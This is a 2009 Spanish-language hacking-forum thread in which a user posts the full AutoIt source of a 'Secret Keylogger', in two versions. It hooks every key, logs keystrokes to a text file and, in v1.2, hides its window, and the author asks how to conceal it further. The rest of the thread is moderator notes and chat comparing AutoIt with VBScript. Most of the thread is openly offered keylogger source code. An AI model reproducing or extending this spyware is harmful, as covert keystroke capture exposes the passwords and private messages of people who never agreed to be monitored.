elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Secret keylogger (creado por mi) -Terminado-
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Secret keylogger (creado por mi) -Terminado-  (Leído 12,466 veces)
tOxiC;

Desconectado Desconectado

Mensajes: 28



Ver Perfil
Secret keylogger (creado por mi) -Terminado-
« en: 22 Julio 2009, 21:44 pm »

Soy nuevo en el foro... ;-)
Este programa se llama Secret Keylogger ( Re original XDD)
Bueno... esta sin terminar, tiene todas las funciones de un keylogger pero me falta que se oculte...
Por ahora ocupa una ventana como todos pero pretendo mejorarlo para q quede oculto...

Esta programado x mi en autoit
Nota: Quisas tengan q mover el "tema" a otro subforo

Una imágen :


Esta programado en AutoIt

Acá les dejo el codigo para q alguien q sepa un poco de autoit lo revise y vea q se puede mejorar ;D... y x fa... alguien expliqueme como hago para q quede oculto XDD

Código:
#NoTrayIcon
#include <Process.au3>
#include <GUIConstants.au3>

$file = FileOpen("slogger.txt", 1)
If $file = -1 Then
 MsgBox(0, "Error", "El file no se pudo crear/abrir.")
 Exit
EndIf

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Secret Keylogger v1.2 BY: JMG", 463, 395, 191, 121)
$Button1 = GUICtrlCreateButton("Comenzar", 16, 32, 73, 33, 0)
$Group1 = GUICtrlCreateGroup("Keylogger", 8, 16, 201, 89)
$Button2 = GUICtrlCreateButton("Guardar Log", 96, 32, 73, 33, 0)
$Button3 = GUICtrlCreateButton("Cerrar", 56, 72, 97, 17, 0)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group2 = GUICtrlCreateGroup("Acerca de secret keylogger", 8, 112, 201, 233)
$Button4 = GUICtrlCreateButton("Acerca del autor", 24, 136, 153, 49, 0)
$Button5 = GUICtrlCreateButton("Acerca de secret keylogger", 24, 192, 153, 49, 0)
$Label5 = GUICtrlCreateLabel("No existen comentarios tontos", 24, 248, 146, 17)
$Label6 = GUICtrlCreateLabel("sino tontos que comentan", 32, 264, 126, 17)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$MonthCal1 = GUICtrlCreateMonthCal("2009/07/12", 240, 40, 193, 177)
$Label4 = GUICtrlCreateLabel("JMG ®", 280, 312, 104, 41)
GUICtrlSetFont(-1, 24, 400, 0, "MS Sans Serif")
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group4 = GUICtrlCreateGroup("Calendario", 224, 24, 225, 201)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While (1)
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
exit
 Case $Button1
 while(1)
HotKeySet("!k", "menukey")
HotKeySet(" ", "logea")
HotKeySet("a", "logea")
HotKeySet("b", "logea")
HotKeySet("c", "logea")
HotKeySet("d", "logea")
HotKeySet("e", "logea")
HotKeySet("f", "logea")
HotKeySet("g", "logea")
HotKeySet("h", "logea")
HotKeySet("i", "logea")
HotKeySet("j", "logea")
HotKeySet("k", "logea")
HotKeySet("l", "logea")
HotKeySet("m", "logea")
HotKeySet("n", "logea")
HotKeySet("ñ", "logea")
HotKeySet("o", "logea")
HotKeySet("p", "logea")
HotKeySet("q", "logea")
HotKeySet("r", "logea")
HotKeySet("s", "logea")
HotKeySet("t", "logea")
HotKeySet("u", "logea")
HotKeySet("v", "logea")
HotKeySet("w", "logea")
HotKeySet("x", "logea")
HotKeySet("y", "logea")
HotKeySet("z", "logea")
HotKeySet("A", "logea")
HotKeySet("B", "logea")
HotKeySet("C", "logea")
HotKeySet("D", "logea")
HotKeySet("E", "logea")
HotKeySet("F", "logea")
HotKeySet("G", "logea")
HotKeySet("H", "logea")
HotKeySet("I", "logea")
HotKeySet("J", "logea")
HotKeySet("K", "logea")
HotKeySet("L", "logea")
HotKeySet("M", "logea")
HotKeySet("N", "logea")
HotKeySet("Ñ", "logea")
HotKeySet("O", "logea")
HotKeySet("P", "logea")
HotKeySet("Q", "logea")
HotKeySet("R", "logea")
HotKeySet("S", "logea")
HotKeySet("T", "logea")
HotKeySet("U", "logea")
HotKeySet("V", "logea")
HotKeySet("W", "logea")
HotKeySet("X", "logea")
HotKeySet("Y", "logea")
HotKeySet("Z", "logea")
HotKeySet("0", "logea")
HotKeySet("1", "logea")
HotKeySet("2", "logea")
HotKeySet("3", "logea")
HotKeySet("4", "logea")
HotKeySet("5", "logea")
HotKeySet("6", "logea")
HotKeySet("7", "logea")
HotKeySet("8", "logea")
HotKeySet("9", "logea")
hotkeyset("ª", "logea")
hotkeyset("º", "logea")
hotkeyset("\", "logea")
hotkeyset("!", "logea")
hotkeyset("|", "logea")
hotkeyset("@", "logea")
hotkeyset("·", "logea")
hotkeyset("#", "logea")
hotkeyset("$", "logea")
hotkeyset("%", "logea")
hotkeyset("&", "logea")
hotkeyset("¬", "logea")
hotkeyset("/", "logea")
hotkeyset("(", "logea")
hotkeyset(")", "logea")
hotkeyset("=", "logea")
hotkeyset("'", "logea")
hotkeyset("?", "logea")
hotkeyset("¡", "logea")
hotkeyset("¿", "logea")
hotkeyset("ç", "logea")
hotkeyset("}", "logea")
hotkeyset("<", "logea")
hotkeyset(">", "logea")
hotkeyset(",", "logea")
hotkeyset(";", "logea")
hotkeyset(".", "logea")
hotkeyset(":", "logea")
hotkeyset("-", "logea")
hotkeyset("_", "logea")
hotkeyset("´", "logea")
hotkeyset("{", "logea")
hotkeyset("¨", "logea")
hotkeyset("^", "logea")
hotkeyset("`", "logea")
hotkeyset("[", "logea")
hotkeyset("+", "logea")
hotkeyset("*", "logea")
hotkeyset("]", "logea")
wend
Case $Button2
 msgbox(0,"Guardar","Para guardar persiona [alt+k]")
case $Button3
 processclose("AutoIt3.exe")
case $Button4
 msgbox(0,"Autor:","Creado por el_juanchiii(JMG)")
case $Button5
 msgbox(0,"Secret Keylogger","Es solo un keylogger mas ...")
Endswitch
WEnd

Func logea()
HotKeySet(@HotKeyPressed)
FileWrite($file, @HotKeyPressed)
Send(@HotKeyPressed)
EndFunc

Func menukey()
FileClose($file)
FileClose($file)
$contenido = FileRead("slogger.txt")
MsgBox(0,"Keys",$contenido)
$file = FileOpen("slogger.txt", 1)
EndFunc

No es la gran cosa pero ta... :xD

La última version de secret keylogger (v1.2)"Testeado x mi"

Código:
#NoTrayIcon
#include <Process.au3>
#include <GUIConstants.au3>

$file = FileOpen("slogger.txt", 1)
If $file = -1 Then
 MsgBox(0, "Error", "El file no se pudo crear/abrir.")
 Exit
EndIf

#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Secret keylogger V1.2", 412, 348, 189, 116)
$Button1 = GUICtrlCreateButton("Comenzar", 32, 24, 129, 33, 0)
$Button2 = GUICtrlCreateButton("Guardar log", 32, 112, 129, 33, 0)
$Button3 = GUICtrlCreateButton("Cerrar", 32, 64, 129, 33, 0)
$Button4 = GUICtrlCreateButton("Autor", 224, 32, 129, 33, 0)
$Button5 = GUICtrlCreateButton("Secret Keylogger", 224, 72, 129, 33, 0)
$Group1 = GUICtrlCreateGroup("Keylogger", 8, 8, 193, 209)
$Ocultar = GUICtrlCreateButton("Ocultar", 24, 152, 153, 57, 0)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group2 = GUICtrlCreateGroup("Acerca de ", 208, 16, 161, 121)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group3 = GUICtrlCreateGroup("Calendario", 208, 144, 193, 185)
$MonthCal1 = GUICtrlCreateMonthCal("2009/07/23", 216, 160, 177, 161)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Label1 = GUICtrlCreateLabel("--JMG--", 48, 264, 111, 41)
GUICtrlSetFont(-1, 24, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0x00FF00)
GUICtrlSetBkColor(-1, 0x000000)
$Graphic1 = GUICtrlCreateGraphic(16, 224, 177, 113)
GUICtrlSetBkColor(-1, 0x000000)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
 $nMsg = GUIGetMsg()
 Switch $nMsg
 Case $GUI_EVENT_CLOSE
 Exit
Case $Button1
 while(1)
HotKeySet("!k", "menukey")
Hotkeyset("!m", "mostrar")
HotKeySet(" ", "logea")
HotKeySet("a", "logea")
HotKeySet("b", "logea")
HotKeySet("c", "logea")
HotKeySet("d", "logea")
HotKeySet("e", "logea")
HotKeySet("f", "logea")
HotKeySet("g", "logea")
HotKeySet("h", "logea")
HotKeySet("i", "logea")
HotKeySet("j", "logea")
HotKeySet("k", "logea")
HotKeySet("l", "logea")
HotKeySet("m", "logea")
HotKeySet("n", "logea")
HotKeySet("ñ", "logea")
HotKeySet("o", "logea")
HotKeySet("p", "logea")
HotKeySet("q", "logea")
HotKeySet("r", "logea")
HotKeySet("s", "logea")
HotKeySet("t", "logea")
HotKeySet("u", "logea")
HotKeySet("v", "logea")
HotKeySet("w", "logea")
HotKeySet("x", "logea")
HotKeySet("y", "logea")
HotKeySet("z", "logea")
HotKeySet("A", "logea")
HotKeySet("B", "logea")
HotKeySet("C", "logea")
HotKeySet("D", "logea")
HotKeySet("E", "logea")
HotKeySet("F", "logea")
HotKeySet("G", "logea")
HotKeySet("H", "logea")
HotKeySet("I", "logea")
HotKeySet("J", "logea")
HotKeySet("K", "logea")
HotKeySet("L", "logea")
HotKeySet("M", "logea")
HotKeySet("N", "logea")
HotKeySet("Ñ", "logea")
HotKeySet("O", "logea")
HotKeySet("P", "logea")
HotKeySet("Q", "logea")
HotKeySet("R", "logea")
HotKeySet("S", "logea")
HotKeySet("T", "logea")
HotKeySet("U", "logea")
HotKeySet("V", "logea")
HotKeySet("W", "logea")
HotKeySet("X", "logea")
HotKeySet("Y", "logea")
HotKeySet("Z", "logea")
HotKeySet("0", "logea")
HotKeySet("1", "logea")
HotKeySet("2", "logea")
HotKeySet("3", "logea")
HotKeySet("4", "logea")
HotKeySet("5", "logea")
HotKeySet("6", "logea")
HotKeySet("7", "logea")
HotKeySet("8", "logea")
HotKeySet("9", "logea")
hotkeyset("ª", "logea")
hotkeyset("º", "logea")
hotkeyset("\", "logea")
hotkeyset("!", "logea")
hotkeyset("|", "logea")
hotkeyset("@", "logea")
hotkeyset("·", "logea")
hotkeyset("#", "logea")
hotkeyset("$", "logea")
hotkeyset("%", "logea")
hotkeyset("&", "logea")
hotkeyset("¬", "logea")
hotkeyset("/", "logea")
hotkeyset("(", "logea")
hotkeyset(")", "logea")
hotkeyset("=", "logea")
hotkeyset("'", "logea")
hotkeyset("?", "logea")
hotkeyset("¡", "logea")
hotkeyset("¿", "logea")
hotkeyset("ç", "logea")
hotkeyset("}", "logea")
hotkeyset("<", "logea")
hotkeyset(">", "logea")
hotkeyset(",", "logea")
hotkeyset(";", "logea")
hotkeyset(".", "logea")
hotkeyset(":", "logea")
hotkeyset("-", "logea")
hotkeyset("_", "logea")
hotkeyset("´", "logea")
hotkeyset("{", "logea")
hotkeyset("¨", "logea")
hotkeyset("^", "logea")
hotkeyset("`", "logea")
hotkeyset("[", "logea")
hotkeyset("+", "logea")
hotkeyset("*", "logea")
hotkeyset("]", "logea")
wend
Case $Button2
 msgbox(0,"Guardar","Para guardar persiona [alt+k]")
case $Button3
 processclose("AutoIt3.exe")
case $Button4
 msgbox(0,"Autor:","Creado por el_juanchiii(JMG)")
case $Button5
 msgbox(0,"Secret Keylogger","Es solo un keylogger mas ...")
Case $Ocultar
 msgbox(0,"Ocultar:","Para mostrar la ventana otra vez preciona [alt+m]")
 guisetstate(@SW_HIDE)
 EndSwitch
WEnd

Func logea()
HotKeySet(@HotKeyPressed)
FileWrite($file, @HotKeyPressed)
Send(@HotKeyPressed)
EndFunc

Func menukey()
FileClose($file)
FileClose($file)
$contenido = FileRead("slogger.txt")
MsgBox(0,"Keys",$contenido)
$file = FileOpen("slogger.txt", 1)
EndFunc

Func mostrar()
 guisetstate(@SW_SHOW)
 endfunc

A ver ahora...
No subo el .exe xq me lo borran :¬¬

Pero esta todo bien con los mod igual ;D


« Última modificación: 27 Julio 2009, 06:25 am por Novlucker » En línea

Nø ë×î§tën çømëntå®îø§ tøntø§ §înø tøntø§ qüë çømëntån...





Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Secret keylogger (creado por mi) -sin terminar-
« Respuesta #1 en: 22 Julio 2009, 22:08 pm »

Buenas ... teniendo código no es necesario dejar el exe :P1

También muevo el post a scripting (sus autores dicen que es script) a ver si se revisa mejor y se encuentra solución a tu "problema" ;)

Saludos


1 Lo he quitado porque puede que tus intenciones sean buenas, pero la experiencia con ejecutables aportados por usuarios no es buena, no es nada personal :rolleyes:


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Secret keylogger (creado por mi) -sin terminar-
« Respuesta #2 en: 23 Julio 2009, 17:27 pm »

¿Que lenguaje de programación es ese?
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Secret keylogger (creado por mi) -sin terminar-
« Respuesta #3 en: 23 Julio 2009, 17:31 pm »

Citar
Esta programado en AutoIt
:http://www.autoitscript.com/autoit3/

Si no lo has probado descubrirás que la principal "contra" es que .. se pueden crear ejecutables que no dependan de ninguna librería ... pero a cambio puedes tener un ejecutable que solo muestra un msgbox, y que pesa 250kb  :¬¬

 :P
« Última modificación: 23 Julio 2009, 17:38 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Secret keylogger (creado por mi) -sin terminar-
« Respuesta #4 en: 23 Julio 2009, 17:40 pm »

Citar
Esta programado en AutoIt
:http://www.autoitscript.com/autoit3/

Si no lo has probado descubrirás que la principal "contra" es que .. se pueden crear ejecutables que no dependan de ninguna librería ... pero a cambio puedes tener un ejecutable que solo muestra un msgbox, y que pesa 250kb  :¬¬

 :P

Jaja, que mal, bueno, al cabos que ni quería.  :P
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Erik#


Desconectado Desconectado

Mensajes: 1.138


Gundam


Ver Perfil
Re: Secret keylogger (creado por mi) -Terminado-
« Respuesta #5 en: 24 Julio 2009, 22:35 pm »

Pero autoit es más potente que vbs?
En línea

tOxiC;

Desconectado Desconectado

Mensajes: 28



Ver Perfil
Re: Secret keylogger (creado por mi) -Terminado-
« Respuesta #6 en: 24 Julio 2009, 22:43 pm »

Citar
Pero autoit es más potente que vbs?

No ... solo es mas facil ...  ;D
En línea

Nø ë×î§tën çømëntå®îø§ tøntø§ §înø tøntø§ qüë çømëntån...





Erik#


Desconectado Desconectado

Mensajes: 1.138


Gundam


Ver Perfil
Re: Secret keylogger (creado por mi) -Terminado-
« Respuesta #7 en: 24 Julio 2009, 23:04 pm »

Pero podemos hacer interfaz grafica a diferencia de vbs :P
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Secret keylogger (creado por mi) -Terminado-
« Respuesta #8 en: 25 Julio 2009, 03:05 am »

Pero podemos hacer interfaz grafica a diferencia de vbs :P

Eso es verdad ... en vbs no es posible crear GUI's directamente ya que el lenguaje no incorpora de manera nativa la manera de hacerlo ... pero se puede incrustar vbs en aplicaciones HTA, archivos html que funcionan como "aplicaciones de escritorio"

:http://msdn.microsoft.com/en-us/library/ms536496%28VS.85%29.aspx
:http://technet.microsoft.com/en-us/scriptcenter/dd742317.aspx

Citar
Pero autoit es más potente que vbs?

No ... solo es mas facil ... ;D

Si, porque al igual que otros lenguajes incorpora includes, por lo que tiene muchas "librerías" con funciones pre-creadas que facilitan la tarea del programador  :P
Ah! el uso de APIs también suma mucho, pero como he dicho antes el peso de los ejecutables es excesivo, así que en eso no puede competir contra otros lenguajes más poderosos

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Pablo Videla


Desconectado Desconectado

Mensajes: 2.274



Ver Perfil WWW
Re: Secret keylogger (creado por mi) -Terminado-
« Respuesta #9 en: 25 Julio 2009, 04:27 am »

tan simple es  :o?
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
He terminado
Diseño Gráfico
Saberuneko 6 4,531 Último mensaje 12 Junio 2009, 20:33 pm
por Yasmesita
Secret, una red social con peligro
Noticias
wolfbcn 0 1,190 Último mensaje 17 Agosto 2014, 03:08 am
por wolfbcn
Obteniendo el componente SECRET en AES_ECB
Criptografía
AlbertoBSD 1 2,316 Último mensaje 4 Julio 2016, 16:16 pm
por kub0x
He creado un nuevo virus de tipo keylogger
Bugs y Exploits
MissingFile123 2 5,889 Último mensaje 6 Mayo 2021, 13:33 pm
por el-brujo
shared secret en bitcoin
Criptografía
AlbertoBSD 2 4,014 Último mensaje 1 Marzo 2022, 16:47 pm
por AlbertoBSD
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines